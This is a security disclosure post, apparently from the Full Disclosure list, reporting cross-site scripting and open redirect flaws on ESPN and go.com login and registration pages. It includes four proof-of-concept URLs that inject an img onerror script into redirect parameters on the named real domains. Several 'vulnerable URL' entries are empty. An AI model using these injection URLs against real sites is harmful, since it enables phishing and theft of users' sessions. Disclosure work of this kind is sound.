ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities
Domain:
http://espn.go.com/
“ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.
ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.”(Wikipedia)
Vulnerability description:
Espn.go.com has a cyber security bug problem. It is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.
Those vulnerabilities are very dangerous. Since they happen at ESPN’s “login” & “register” pages that are credible. Attackers can abuse those links to mislead ESPN’s users. The success rate of attacks may be high.
During the tests, besides the links given above, large number of ESPN’s links are vulnerable to those attacks.
The programming code flaw occurs at “espn.go.com”‘s “login?” & “register” pages with “redirect” parameter, i.e.
Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 8.
Disclosed by:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tetraph.com/wangjing/
“The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers’ right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!” A great many of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and Open Redirect vulnerabilities and cyber intelligence recommendations.
(1) XSS Web Security Vulnerability
XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results
- Identity theft
- Accessing sensitive or restricted information
- Gaining free access to otherwise paid for content
- Spying on user’s web browsing habits
- Altering browser functionality
- Public defamation of an individual or corporation
- Web application defacement
- Denial of Service attacks
Vulnerable URLs:
POC:
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459“><img src=x onerror=prompt(‘justqdjing’)>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn®FormId=espn“><img src=x onerror=prompt(‘justqdjing’)>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate“><img src=x onerror=prompt(‘justqdjing’)>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login“><img src=x onerror=prompt(‘justqdjing’)>
(2) Dest Redirect Privilege Escalation Vulnerability Web Security Vulnerability
From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker’s choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.
Use one of webpages for the following tests. The webpage address is “https://computerpitch.wordpress.com/“. Suppose that this webpage is malicious.
The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.
(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability
Vulnerable URL 1:
Vulnerable URL 2:
(2.2) Vulnerabilities Attacked without User Login
Vulnerable URL 1:
This vulnerability was used to demonstrate “Covert Redirect” of Facebook,
Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms
Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/
Vulnerable URL 2:
POC:
Vulnerable URL 3:
POC:
(3) Those security problems were reported to ESPN in early 2014. However, they are still unpatched.
More Details:
http://seclists.org/fulldisclosure/2014/Dec/36
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register
http://diebiyi.com/articles/security/espn-xss-open-redirect/
https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest
http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss
https://www.facebook.com/permalink.php?story_fbid=435630669942495
http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e
http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html
http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect
http://ittechnology.lofter.com/post/1cfbf60d_730f11d
http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/
https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/
https://www.facebook.com/permalink.php?story_fbid=1631949187023558
https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg
http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3
http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/
